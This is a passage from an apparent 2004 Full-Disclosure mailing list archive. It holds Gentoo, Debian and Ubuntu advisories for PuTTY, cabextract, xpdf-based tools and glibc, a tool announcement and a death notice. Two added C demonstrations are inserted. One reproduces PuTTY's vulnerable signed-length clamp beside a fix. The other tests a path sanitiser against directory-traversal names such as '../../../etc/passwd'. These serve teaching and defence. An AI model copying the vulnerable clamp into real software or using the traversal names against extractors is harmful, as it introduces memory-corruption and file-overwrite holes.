When PuTTY connects to a server using the SSH2 protocol, an attacker
may be able to send specially crafted packets to the client, resulting
in the execution of arbitrary code with the permissions of the user
running PuTTY. Note that this is possible during the authentication
process but before host key verification.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All PuTTY users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-misc/putty-0.56"

References
==========

  [ 1 ] iDEFENSE Security Advisory 10.27.04
        http://www.idefense.com/application/poi/display?id=155
  [ 2 ] PuTTY ChangeLog
        http://www.chiark.greenend.org.uk/~sgtatham/putty/changes.html

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200410-29.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQBBgBeFzKC5hMHO6rkRAuLuAJ9u0LwYx5mqaWivhqtHlbXtPGqHmQCgjdkM
dT7RZFUNhC4HcTaBNua3fF4=
=OMob
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
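The signedness failure described in the iDEFENSE advisory above (section II) and in this GLSA, modelled in an added example that is not PuTTY's code: the clamp from the quoted PuTTY 0.55 snippet sits beside a corrected clamp, and both are run over a constructed SSH2_MSG_DEBUG body so the effect can be observed without corrupting memory. The 512-byte buffer, the "Remote debug message: " prefix and the packet offsets (length at +7, string at +11) are taken from the snippet; get_32bit(), the demo_* wrappers and the packet bytes are assumptions made for this demonstration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not PuTTY's code: models the SSH2_MSG_DEBUG length clamp
 * quoted in the iDEFENSE advisory (PuTTY 0.55) next to a corrected clamp.
 * The 512-byte buffer, the prefix string and the packet offsets follow the
 * quoted snippet; the packet bytes built below are constructed for the demo. */

#define BUF_SIZE 512
static const char PREFIX[] = "Remote debug message: ";

/* Big-endian 32-bit read, as GET_32BIT() does in the snippet. */
static uint32_t get_32bit(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* The vulnerable clamp.  The length lands in a signed int and the compare is
 * signed, so any wire value >= 0x80000000 is negative, passes the check
 * unchanged and reaches memcpy(), which takes a size_t.  Returns the length
 * that would be handed to memcpy(). */
int vulnerable_stringlen(const unsigned char *pkt)
{
    int prefix = (int)strlen(PREFIX);
    int stringlen = (int)get_32bit(pkt + 7);   /* wraps negative above INT_MAX */
    if (stringlen > (int)(BUF_SIZE - prefix - 1))
        stringlen = BUF_SIZE - prefix - 1;
    return stringlen;
}

/* Corrected clamp: keep the length unsigned, bound it by the free space in
 * buf, and also by the bytes actually present in the packet. */
size_t fixed_stringlen(const unsigned char *pkt, size_t pktlen)
{
    size_t prefix = strlen(PREFIX);
    size_t room = BUF_SIZE - prefix - 1;
    size_t avail = pktlen > 11 ? pktlen - 11 : 0;  /* string starts at +11 */
    size_t stringlen = get_32bit(pkt + 7);
    if (stringlen > room)  stringlen = room;
    if (stringlen > avail) stringlen = avail;
    return stringlen;
}

/* What memcpy() is really asked to copy once the int is converted. */
size_t memcpy_size_for(int stringlen)
{
    return (size_t)stringlen;
}

/* Constructed SSH2_MSG_DEBUG body: 7 bytes the snippet skips, a 4-byte
 * big-endian length, then a short string. */
void build_debug_packet(unsigned char *pkt, uint32_t len_field)
{
    memset(pkt, 0, 11);
    pkt[7]  = (unsigned char)(len_field >> 24);
    pkt[8]  = (unsigned char)(len_field >> 16);
    pkt[9]  = (unsigned char)(len_field >> 8);
    pkt[10] = (unsigned char)(len_field);
    memcpy(pkt + 11, "hello", 5);
}

#define DEMO_PKT_LEN 16   /* 11 header bytes + 5 string bytes */

/* Wrappers: run each clamp over a 16-byte constructed packet whose length
 * field is len_field. */
int demo_vulnerable(uint32_t len_field)
{
    unsigned char pkt[DEMO_PKT_LEN];
    build_debug_packet(pkt, len_field);
    return vulnerable_stringlen(pkt);
}

size_t demo_fixed(uint32_t len_field)
{
    unsigned char pkt[DEMO_PKT_LEN];
    build_debug_packet(pkt, len_field);
    return fixed_stringlen(pkt, sizeof pkt);
}

int main(void)
{
    uint32_t cases[] = { 5u, 0x7FFFFFFFu, 0xFFFFFFF0u };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++) {
        int bad = demo_vulnerable(cases[i]);
        printf("len field 0x%08x: 0.55 clamp -> %d (memcpy size %zu), "
               "fixed clamp -> %zu\n",
               cases[i], bad, memcpy_size_for(bad), demo_fixed(cases[i]));
    }
    return 0;
}
```

With a length field of 0xFFFFFFF0 the 0.55 clamp returns -16, which memcpy() receives as a size_t just short of SIZE_MAX, while the corrected clamp returns the five bytes actually present. A positive but oversized field (0x7FFFFFFF) is clamped by both, which is why the bug is a signedness issue and not a missing check. The corrected version also bounds the copy by the packet length; clamping to the buffer alone would still let a short packet be over-read.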


 
[Full-Disclosure] PTms04-030

From: pigrelax (pigrelax@yandex.ru)
Date: Tue Oct 26 2004 - 03:21:38 CDT


PTms04-030 - tool for checking WebDAV XML DoS vulnerability.

More information and download:

http://www.securitylab.ru/tools/48998.html

This email and any files transmitted with it are intended for the named recipient only. The information contained in this message may be confidential, legally privileged or commercially sensitive. If you are not the intended recipient you must not reproduce or distribute any part of the email, disclose its contents to any other party, or take any action in reliance on it. If you have received this email in error, please contact the sender immediately by return email and delete this message from your computer.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] Death Notice: Matt Heckaman

From: J.A. Terranson (measl@mfn.org)
Date: Wed Oct 27 2004 - 23:11:20 CDT


[Posted to a variety of places, as Matt was a prolific coder who
maintained many ports and worked on literally dozens of projects]

--
Yours,

J.A. Terranson
sysadmin@mfn.org
0xBD4A95BF

        "An ill wind is stalking
        while evil stars whir
        and all the gold apples
        go bad to the core"

        S. Plath, Temper of Time

------------------------------------------------------------------------------

http://obit.pumphreyfuneralhome.com/obit_display.cgi?id=161939&listing=Current

Matthew Heckaman Ferraro
Born in Mishawaka, IN on Jan. 4, 1982
Departed on Oct. 20, 2004 and resided in Gaithersburg, MD.

Memorial Service: Oct. 30, 2004
Cemetery: Arlington National Cemetery Columbarium
Please click on the links above for locations, times, maps, and
directions.

Matthew Heckaman Ferraro (age 22)
Matthew of Gaithersburg, MD, formerly of Montreal Canada,
passed away on Wednesday, October 20, 2004. He was the beloved
husband of Stacie Jo Ferraro; loving son of Claire Ferraro
(husband, Eddy) and Marshall Heckaman (wife, Sharon) of Indiana;
loving brother of Andria, David and Allan; stepbrother of Cynthia
Ferraro (Daniel Aston) son-in-law of Mike and Marjorie Bland of
Maryland and their daughters, Resha and Stephanie; grandson of
Adrien and Cecile Blanchette of Montreal, Canada and John and
Ruth Heckaman of Indiana; grandson-in-law of Anastacia Quitania.
He was predeceased by a stepbrother Jonathan Ferraro. Also survived
by his aunts and uncles, Helene Blanchette (Denis Pare) and Pierre
Blanchette of Montreal, Canada, Nicole Blanchette (Brian Smith) of
London, Ont., Dorothy (Doc) Anderson of Illinois and by all his
extended family and friends in Montreal, Indiana, Maryland and
elsewhere. Matthew was an active duty PV2 of the United States
Army. A memorial service will be held at PUMPHREY'S COLONIAL FUNERAL
HOME, 300 West Montgomery Avenue (Rte 28 just off I-270, exit 6-A)
Rockville, MD on Saturday, October 30, 2004 at 1 PM. Inurnment service
with Military Honors will be held at Arlington National Cemetery
Columbarium on Thursday, November 4, 2004 at 10 AM.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] [SECURITY] [DSA 574-1] New cabextract packages fix unintended directory traversal

debian-security-announce@lists.debian.org
Date: Thu Oct 28 2004 - 00:09:04 CDT


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 574-1 security@debian.org
http://www.debian.org/security/ Martin Schulze
October 28th, 2004 http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package : cabextract
Vulnerability : missing directory sanitising
Problem-Type : remote
Debian-specific: no
CVE ID : CAN-2004-0916
Debian Bug : 277522

The upstream developers discovered a problem in cabextract, a tool to
extract cabinet files. The program was able to overwrite files in
upper directories. This could allow an attacker to overwrite arbitrary
files.

For the stable distribution (woody) this problem has been fixed in
version 0.2-2b.

For the unstable distribution (sid) this problem has been fixed in
version 1.1-1.

We recommend that you upgrade your cabextract package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/c/cabextract/cabextract_0.2-2b.dsc
      Size/MD5 checksum: 568 72c81704917abe1f37ae4694392c97e3
    http://security.debian.org/pool/updates/main/c/cabextract/cabextract_0.2-2b.diff.gz
      Size/MD5 checksum: 2314 d31e74e1186f00a60dc944bec28829f9
    http://security.debian.org/pool/updates/main/c/cabextract/cabextract_0.2.orig.tar.gz
      Size/MD5 checksum: 66136 8f59514ec67cfb43658c57c67c864b74

  Alpha architecture:

    http://security.debian.org/pool/updates/main/c/cabextract/cabextract_0.2-2b_alpha.deb
      Size/MD5 checksum: 20344 2eba57f87ea2348e3e0322eb5d7ce3a5

  ARM architecture:

    http://security.debian.org/pool/updates/main/c/cabextract/cabextract_0.2-2b_arm.deb
      Size/MD5 checksum: 16514 0c1b72dfef4454c9a4140d4728b6d56d

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/c/cabextract/cabextract_0.2-2b_i386.deb
      Size/MD5 checksum: 15054 f0b5a915d31a51dbad5df5163c326204

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/c/cabextract/cabextract_0.2-2b_ia64.deb
      Size/MD5 checksum: 23934 7a180cb2c7321533839d88edfde0664e

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/c/cabextract/cabextract_0.2-2b_hppa.deb
      Size/MD5 checksum: 17784 50e507a1108c883a550f6b14b01238be

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/c/cabextract/cabextract_0.2-2b_m68k.deb
      Size/MD5 checksum: 15034 e576be7c48a6217bc3d04f850b622ea9

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/c/cabextract/cabextract_0.2-2b_mips.deb
      Size/MD5 checksum: 17948 427396df5074b07059f35d1603512423

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/c/cabextract/cabextract_0.2-2b_mipsel.deb
      Size/MD5 checksum: 17884 de2d86ebeb9fdcaf58f99e403ca4ba86

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/c/cabextract/cabextract_0.2-2b_powerpc.deb
      Size/MD5 checksum: 16572 f087bc23f1a5ff782ad4a15563482af0

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/c/cabextract/cabextract_0.2-2b_s390.deb
      Size/MD5 checksum: 16658 44e78328ade15ef1b71fe5fec2738bc7

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/c/cabextract/cabextract_0.2-2b_sparc.deb
      Size/MD5 checksum: 18692 ad98229293a9a753db5d371cab657d06

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFBgH7wW5ql+IAeqTIRAo/oAKCp8cfa0FAGZccSf1Z/cThHrha8dACePC+c
RFwKfrysKwA898z3JLSmEGw=
=rbCk
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
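The "missing directory sanitising" in this DSA is the check an extractor must apply to every member name before creating it under the output directory. The following is an added example, not cabextract's code or its actual fix: it accepts only relative names with no ".." component, treating both slash and backslash as separators since cabinet files are normally produced by Windows tools, and joins accepted names onto the output directory. The member names and the /tmp/out directory are constructed for the demonstration.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Added example, not cabextract's code: the sanitising step an archive
 * extractor needs before it creates a member under its output directory.
 * A member name is accepted only if it is relative and no component is
 * "..".  Both '/' and '\\' count as separators, since cabinet files are
 * normally written by Windows tools.  The member names in the demo are
 * constructed for illustration. */

bool cab_path_is_safe(const char *path)
{
    if (path == NULL || *path == '\0')
        return false;
    if (path[0] == '/' || path[0] == '\\')
        return false;                                   /* absolute path */
    if (isalpha((unsigned char)path[0]) && path[1] == ':')
        return false;                                   /* drive letter */
    const char *p = path;
    while (*p) {
        const char *start = p;
        while (*p && *p != '/' && *p != '\\')
            p++;
        if (p - start == 2 && start[0] == '.' && start[1] == '.')
            return false;                               /* steps upward */
        if (*p)
            p++;                                        /* skip separator */
    }
    return true;
}

/* Joins outdir and a member name into out, converting '\\' to '/'.
 * Returns false (and leaves out empty) if the name fails the check or
 * the result would not fit. */
bool cab_output_path(char *out, size_t cap, const char *outdir, const char *member)
{
    out[0] = '\0';
    if (!cab_path_is_safe(member))
        return false;
    size_t dl = strlen(outdir), ml = strlen(member);
    if (dl + 1 + ml + 1 > cap)
        return false;
    memcpy(out, outdir, dl);
    out[dl] = '/';
    for (size_t i = 0; i < ml; i++)
        out[dl + 1 + i] = (member[i] == '\\') ? '/' : member[i];
    out[dl + 1 + ml] = '\0';
    return true;
}

/* Runs the check over a constructed list of member names and returns how
 * many were refused. */
int demo_count_refused(void)
{
    static const char *members[] = {
        "setup/readme.txt",     /* fine */
        "..\\..\\etc\\passwd",  /* climbs out via backslashes */
        "../../../etc/passwd",  /* climbs out via slashes */
        "/etc/passwd",          /* absolute */
        "C:\\Windows\\win.ini", /* drive letter */
        "..notes/plan.txt",     /* component is "..notes", not "..": fine */
    };
    int refused = 0;
    char path[256];
    for (size_t i = 0; i < sizeof members / sizeof members[0]; i++) {
        bool ok = cab_output_path(path, sizeof path, "/tmp/out", members[i]);
        printf("%-24s -> %s\n", members[i], ok ? path : "REFUSED");
        if (!ok)
            refused++;
    }
    return refused;
}

int main(void)
{
    demo_count_refused();
    return 0;
}
```

The check is done on components rather than by searching for the substring "..", so a legitimate name such as "..notes/plan.txt" is not refused while "a/../b" is. An extractor that also follows symbolic links already present in the output directory needs a further check (open the parent with O_NOFOLLOW or compare the resolved path against the output directory), which this example does not attempt.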


 
[Full-Disclosure] [ GLSA 200410-30 ] GPdf, KPDF, KOffice: Vulnerabilities in included xpdf

From: Thierry Carrez (koon@gentoo.org)
Date: Thu Oct 28 2004 - 02:28:05 CDT


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200410-30
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: GPdf, KPDF, KOffice: Vulnerabilities in included xpdf
      Date: October 28, 2004
      Bugs: #68558, #68665, #68571
        ID: 200410-30

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

GPdf, KPDF and KOffice all include vulnerable xpdf code to handle PDF
files, making them vulnerable to execution of arbitrary code upon
viewing a malicious PDF file.

Background
==========

GPdf is a Gnome-based PDF viewer. KPDF, part of the kdegraphics
package, is a KDE-based PDF viewer. KOffice is an integrated office
suite for KDE.

Affected packages
=================

    -------------------------------------------------------------------
     Package                 /  Vulnerable  /                Unaffected
    -------------------------------------------------------------------
  1  app-office/koffice           < 1.3.3-r1               >= 1.3.3-r1
  2  app-text/gpdf                < 2.8.0-r1               >= 2.8.0-r1
                                                          *>= 0.132-r1
  3  kde-base/kdegraphics         < 3.3.1-r1               >= 3.3.1-r1
                                                           *>= 3.3.0-r1
                                                           *>= 3.2.3-r1
    -------------------------------------------------------------------
     3 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

GPdf, KPDF and KOffice all include xpdf code to handle PDF files. xpdf
is vulnerable to multiple integer overflows, as described in GLSA
200410-20.

Impact
======

An attacker could entice a user to open a specially-crafted PDF file,
potentially resulting in execution of arbitrary code with the rights of
the user running the affected utility.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All GPdf users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-text/gpdf-0.132-r1"

All KDE users should upgrade to the latest version of kdegraphics:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=kde-base/kdegraphics-3.3.0-r1"

All KOffice users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-office/koffice-1.3.3-r1"

References
==========

  [ 1 ] GLSA 200410-20
        http://www.gentoo.org/security/en/glsa/glsa-200410-20.xml
  [ 2 ] CAN-2004-0888
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0888
  [ 3 ] CAN-2004-0889
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0889

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200410-30.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



 
[Full-Disclosure] [USN-9-1] tetex-bin vulnerabilities

From: Martin Pitt (martin.pitt@canonical.com)
Date: Thu Oct 28 2004 - 01:08:47 CDT


===========================================================
Ubuntu Security Notice USN-9-1 October 27, 2004
tetex-bin vulnerabilities
CAN-2004-0888
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

tetex-bin

The problem can be corrected by upgrading the affected package to
version 2.0.2-21ubuntu0.1. In general, a standard system upgrade is
sufficient to effect the necessary changes.

Details follow:

Chris Evans and Marcus Meissner recently discovered several integer
overflow vulnerabilities in xpdf, a viewer for PDF files. Because
tetex-bin contains xpdf code, it is also affected. These
vulnerabilities could be exploited by an attacker providing a
specially crafted TeX, LaTeX, or PDF file. Processing such a file with
pdflatex could result in abnormal program termination or the execution
of program code supplied by the attacker.

This bug could be exploited to gain the privileges of the user
invoking pdflatex.

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_2.0.2-21ubuntu0.1.diff.gz
      Size/MD5: 109940 a991d6b8fddbd78ad31ac5a46d79ed01
    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_2.0.2-21ubuntu0.1.dsc
      Size/MD5: 1062 4322b3e9094b0e44f22265593564f139
    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_2.0.2.orig.tar.gz
      Size/MD5: 11677169 8f02d5940bf02072ce5fe05429c90e63

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/libkpathsea-dev_2.0.2-21ubuntu0.1_amd64.deb
      Size/MD5: 72748 26a4fc82ba25ac5ca940a737041453b1
    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/libkpathsea3_2.0.2-21ubuntu0.1_amd64.deb
      Size/MD5: 59692 73a8d7170b832199fd8d30c9ae97b4f1
    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_2.0.2-21ubuntu0.1_amd64.deb
      Size/MD5: 4327570 e2844193fedd86bcd8c47648b312cf34

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/libkpathsea-dev_2.0.2-21ubuntu0.1_i386.deb
      Size/MD5: 64828 d6e40f6dde8b8a0de67a3e09e996e9ae
    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/libkpathsea3_2.0.2-21ubuntu0.1_i386.deb
      Size/MD5: 56096 c2afaf377ee1164b0c7ce88b0576af08
    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_2.0.2-21ubuntu0.1_i386.deb
      Size/MD5: 3811926 21d7b11851a2c74241a4b595d21ef561

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/libkpathsea-dev_2.0.2-21ubuntu0.1_powerpc.deb
      Size/MD5: 74898 3b5ced3706ba6bf1618cf128096e3dfc
    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/libkpathsea3_2.0.2-21ubuntu0.1_powerpc.deb
      Size/MD5: 61010 f1c488019b4869fd5f417f5b11661569
    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_2.0.2-21ubuntu0.1_powerpc.deb
      Size/MD5: 4349926 4a0aebf5a1c3a1ad0c6b8d6ab6a39e04

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBgIzvDecnbV4Fd/IRAmYaAKCOqeKaiXfBM8WSZMfsUB3/R3BJHACdGm96
slvU21a8xWVgtdm6j/n3owE=
=WF2I
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] [USN-4-1] Standard C library script vulnerabilities

From: Martin Pitt (martin.pitt@canonical.com)
Date: Thu Oct 28 2004 - 01:06:43 CDT


===========================================================
Ubuntu Security Notice USN-4-1 October 27, 2004
Standard C library script vulnerabilities
CAN-2004-0968
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

libc6

The problem can be corrected by upgrading the affected package to
version 2.3.2.ds1-13ubuntu2.2. In general, a standard system upgrade
is sufficient to effect the necessary changes.

Details follow:

Recently, Trustix Secure Linux discovered some vulnerabilities in the
libc6 package. The utilities "catchsegv" and "glibcbug" created
temporary files in an insecure way, which allowed a symlink attack to
create or overwrite arbitrary files with the privileges of the user
invoking the program.

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/glibc_2.3.2.ds1-13ubuntu2.2.diff.gz
      Size/MD5: 1718601 cf6afbc349154329c272077c73ba9179
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/glibc_2.3.2.ds1-13ubuntu2.2.dsc
      Size/MD5: 1656 4c7cb8a913a57c4719b608c49c2d2b2e
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/glibc_2.3.2.ds1.orig.tar.gz
      Size/MD5: 13246448 b982bf6ad7ebc8622d3b81d51c44b78a

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/glibc-doc_2.3.2.ds1-13ubuntu2.2_all.deb
      Size/MD5: 3839054 c45aae7010692177a047dc68a0892f7c
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/locales_2.3.2.ds1-13ubuntu2.2_all.deb
      Size/MD5: 3979842 272da092e74a39c4f15d10ddd1c3c2a0

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dbg_2.3.2.ds1-13ubuntu2.2_amd64.deb
      Size/MD5: 9172938 0b62bf67b6b1ea70c2f1dce0a5a72e78
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev_2.3.2.ds1-13ubuntu2.2_amd64.deb
      Size/MD5: 2961890 fca2ae9c057eefebceffc6eef5c44f8c
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-pic_2.3.2.ds1-13ubuntu2.2_amd64.deb
      Size/MD5: 1318744 cae5a17fbbbf4d454aff91f028ba45bf
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-prof_2.3.2.ds1-13ubuntu2.2_amd64.deb
      Size/MD5: 2429958 6111ed6e95b4d3106f516a0e910e6b7d
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-udeb_2.3.2.ds1-13ubuntu2.2_amd64.udeb
      Size/MD5: 953804 8c92652345079beea4059c2bd02cf0f6
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.3.2.ds1-13ubuntu2.2_amd64.deb
      Size/MD5: 5424778 591e999cfc9de47e655365f2a6bd5407
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-dns-udeb_2.3.2.ds1-13ubuntu2.2_amd64.udeb
      Size/MD5: 8168 f007a3aa95bbe190e295ef04b98455b3
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-files-udeb_2.3.2.ds1-13ubuntu2.2_amd64.udeb
      Size/MD5: 15960 a50daa05546194f6d0a30d02bdd666a4
    http://security.ubuntu.com/ubuntu/pool/universe/g/glibc/nscd_2.3.2.ds1-13ubuntu2.2_amd64.deb
      Size/MD5: 90622 3251a57ba6896b412e270ef812500e08

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dbg_2.3.2.ds1-13ubuntu2.2_i386.deb
      Size/MD5: 10199756 981e3d99127302b8955e0d0ecfc87189
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev_2.3.2.ds1-13ubuntu2.2_i386.deb
      Size/MD5: 2510202 4a0c6a6c253aeb99a9698c541de90db5
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-i686_2.3.2.ds1-13ubuntu2.2_i386.deb
      Size/MD5: 944732 45839ff16f3668c6ef58a213c6d805b4
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-pic_2.3.2.ds1-13ubuntu2.2_i386.deb
      Size/MD5: 1015598 8c50383383de8d5f23236ce7211a0e11
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-prof_2.3.2.ds1-13ubuntu2.2_i386.deb
      Size/MD5: 1985400 3882b6b9f770ffe1e2bc3c7ab55c0c5e
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-udeb_2.3.2.ds1-13ubuntu2.2_i386.udeb
      Size/MD5: 691838 94ed23b75666c67bda94b9c07ce4a5a4
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.3.2.ds1-13ubuntu2.2_i386.deb
      Size/MD5: 4844160 d5aebff13cd1eb6f4e29d68c38cd60ae
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-dns-udeb_2.3.2.ds1-13ubuntu2.2_i386.udeb
      Size/MD5: 7702 03de6798940e807729f30a62aac2f7ec
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-files-udeb_2.3.2.ds1-13ubuntu2.2_i386.udeb
      Size/MD5: 13426 b932f23a4f9c3d776c6a7c26612a44d8
    http://security.ubuntu.com/ubuntu/pool/universe/g/glibc/nscd_2.3.2.ds1-13ubuntu2.2_i386.deb
      Size/MD5: 88312 99d91c0cf770b202b37ed8ae0b131ed4

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dbg_2.3.2.ds1-13ubuntu2.2_powerpc.deb
      Size/MD5: 9216664 64ef82237a246fa888980efa4ea3fe76
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev_2.3.2.ds1-13ubuntu2.2_powerpc.deb
      Size/MD5: 3068930 ce32157ff282f9f48ffeba47bc4a7cc9
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-pic_2.3.2.ds1-13ubuntu2.2_powerpc.deb
      Size/MD5: 1272340 804072cb7e38a128ab022f05c88bc456
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-prof_2.3.2.ds1-13ubuntu2.2_powerpc.deb
      Size/MD5: 2582898 2c84b6bf455a4a7c3742307bb8c87c00
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-udeb_2.3.2.ds1-13ubuntu2.2_powerpc.udeb
      Size/MD5: 946680 0ea82c88731a21d61b3a633b4eaffda8
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.3.2.ds1-13ubuntu2.2_powerpc.deb
      Size/MD5: 4213364 4f0c8de536cd48d333e52cde5aa5a0e3
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-dns-udeb_2.3.2.ds1-13ubuntu2.2_powerpc.udeb
      Size/MD5: 8194 e90b76a0e762d97deddee338ea46c475
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-files-udeb_2.3.2.ds1-13ubuntu2.2_powerpc.udeb
      Size/MD5: 14766 82dcd7f1abfac39464135522a96f1d42
    http://security.ubuntu.com/ubuntu/pool/universe/g/glibc/nscd_2.3.2.ds1-13ubuntu2.2_powerpc.deb
      Size/MD5: 89468 1debcc6600d1c3d4e60b1156178f99c7

-----BEGIN PGP SIGNATURE-----
